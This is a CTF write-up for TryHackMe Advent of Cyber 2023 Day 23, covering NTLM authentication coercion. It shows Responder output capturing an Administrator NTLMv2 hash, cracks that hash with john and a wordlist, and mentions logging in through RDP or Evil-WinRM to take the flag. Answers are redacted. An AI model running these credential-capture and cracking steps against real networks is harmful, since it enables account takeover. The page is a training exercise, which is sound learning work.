> For the complete documentation index, see [llms.txt](https://bunring.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://bunring.gitbook.io/ctf-writeups/try-hack-me/advent-of-cyber-2023/day-23.md).

# Day 23

Learning Objectives

* The basics of network file shares
* Understanding NTLM authentication
* How NTLM authentication coercion attacks work
* How Responder works for authentication coercion attacks
* Forcing authentication coercion using `lnk` files

This room is again a very straightforward one with all commands and instructions already given. We just need to follow along and run them.

```
What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]
```

```
What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]
```

```
What is the name of the tool that can intercept these authentication challenges?
[REDACTED]
```

{% code overflow="wrap" %}

```
What is the password that McGreedy set for the Administrator account?
[REDACTED]

This can be found once the hash is obtained and with the help of hydra we can get the password.

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0   
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    .
    .
    .
[+] Current Session Variables:
    Responder Machine Name     [WIN-55XORMSS5HF]
    Responder Domain Name      [3ES2.LOCAL]
    Responder DCE-RPC Port     [46997]

[+] Listening for events...                                                                                                                                 

[SMB] NTLMv2-SSP Client   : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator                                                                                                                                                                                       
[SMB] NTLMv2-SSP Hash     : [REDACTED]                                                                                                                                                                                                             
[*] Skipping previously captured hash for ELFHQSERVER\Administrator                                                                                                                                                                         
[*] Skipping previously captured hash for ELFHQSERVER\Administrator    
```

{% endcode %}

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~/Desktop/git/ntlm_theft/stealthy]
└─$ john --wordlist=greedykeys.txt hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]
```

{% endcode %}

{% code overflow="wrap" %}

```
What is the value of the flag that is placed on the Administrator’s desktop?
[REDACTED]

We can either RDP into the machine with ther username and password that we found or use Evil-WinRM. The flag can be found on the desktop.
```

{% endcode %}

<figure><img src="/files/enZPzyy1TI2vjdygkHvi" alt=""><figcaption></figcaption></figure>
